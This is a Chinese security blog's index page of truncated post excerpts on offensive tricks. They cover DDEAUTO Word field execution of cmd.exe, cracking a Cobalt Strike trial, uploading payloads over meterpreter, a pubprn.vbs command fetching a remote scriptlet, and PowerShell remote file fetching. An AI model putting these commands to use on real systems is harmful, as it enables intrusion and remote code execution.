in 技术分享奇技淫巧

今天学到了一个新的Word执行代码的方式,也是不需要启用宏的,所以分享给大家一波。操作也挺简单的。 首先新建一个word文档,然后插入域: 选择 = (Formula) 右键,切换域代码 代码处修改为: {DDEAUTO c:\\windows\\system32\\cmd.exe &q...

in 工具收集

之前一直想下载3.8,但是没下载到,看到小伙伴留言发了一个试用版的链接(安全性未知)。 链接:戳我 然后就下载了一下,发现这个并不是破解版。如下图: 所以就对其进行了简单的修改,并把方法分享给大家,以便大家使用。 首先,对cobaltstrike.jar进行解压,解压以后找到common...

in 奇技淫巧

为了测试,在这里使用Cobaltstrike 生成一个exe,用来查看文件是否上传成功,并可以顺利执行,每次上传文件以后,服务器自动删除,如下图: PS: meterpreter会话是通过powershell web_delivery获取的 尝试创建文件夹成功: 将文件上传至特殊目录:...

in 技术分享奇技淫巧

远程执行sct的另一种姿势 cscript /b C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs 127.0.0.1 script:https://gist.githubusercontent.com/enigma0x3/...

in 技术分享工具收集

$ie = New-Object -Com internetExplorer.Application $ie.Navigate("https://site.com/somefile") #------------------------------ #Wait for D...